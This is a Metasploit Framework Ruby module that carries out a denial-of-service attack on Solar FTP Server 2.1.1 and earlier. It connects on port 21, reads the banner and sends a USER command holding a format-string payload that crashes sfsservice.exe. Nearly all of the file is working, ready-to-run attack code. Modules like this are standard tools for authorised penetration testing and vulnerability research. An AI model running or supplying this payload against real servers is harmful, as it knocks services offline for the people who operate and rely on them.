## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize(info={}) super(update_info(info, 'Name' => 'Solar FTP Server <= 2.1.1 Malformed (User) Denial of Service', 'Description' => %q{ This module will send a format string as USER to Solar FTP, causing a READ violation in function "__output_1()" found in "sfsservice.exe" while trying to calculate the length of the string. }, 'Author' => [ 'x000 <3d3n[at]hotmail.com.br>', #Initial disclosure/exploit 'C4SS!0 G0M3S ', #Metasploit submission 'sinn3r', #Metasploit edit/commit ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/16204/' ], ], 'DisclosureDate' => 'Feb 22 2011')) register_options( [ Opt::RPORT(21) ],self.class) end def run connect banner = sock.get_once(-1, 10) print_status("Banner: #{banner.strip}") buf = Rex::Text.pattern_create(50) buf << "%s%lf%n%c%l%c%n%n%n%nC%lf%u%lf%d%s%v%n" print_status("Sending format string...") sock.put("USER #{buf}\r\n") disconnect end end